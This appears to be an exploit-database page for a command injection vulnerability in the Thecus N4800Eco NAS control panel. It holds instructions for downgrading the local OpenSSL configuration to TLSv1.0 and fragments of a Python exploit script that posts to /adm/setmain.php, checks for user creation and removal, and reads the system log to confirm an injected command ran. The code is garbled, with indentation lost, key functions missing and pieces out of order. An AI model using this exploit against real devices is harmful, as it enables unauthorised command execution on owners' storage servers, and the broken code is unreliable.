Thecus n4800eco nas server control panel comand injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-06-02 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Thecus n4800eco nas server control panel comand injection is for educational purposes only and if it is used you will do on your own risk!
# To fix SSL error that occurs when the script is started.
# 1- Open /etc/ssl/openssl.cnf file
# At the bottom of the file:
# [system_default_sect]
# MinProtocol = TLSv1.2
# CipherString = DEFAULT@SECLEVEL=2
# 2- Set value of MinProtocol as TLSv1.0
def readResult(s, target):
d = {
"fun": "setlog",
"action": "query",
"params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
}
url = "http://" + target + "/adm/setmain.php"
resultReq = s.post(url, data=d, verify=False)
dict = resultReq.text.split()
print("[+] Reading system log...\n")
print(dict[5:8]) #change this range to read whole output of the command
if 'Local User remove succeeds' in delUserReq.text:
print('[+] %s command was executed successfully' % command)
else:
print('[-] %s command was not executed!' %command)
sys.exit(1)
readResult(s, target)
if 'Users and groups were created successfully.' in addUserReq.text:
print('[+] Users and groups were created successfully')
else:
print('[-] Users and groups were not created')
sys.exit(1)
delUser(s, target, command)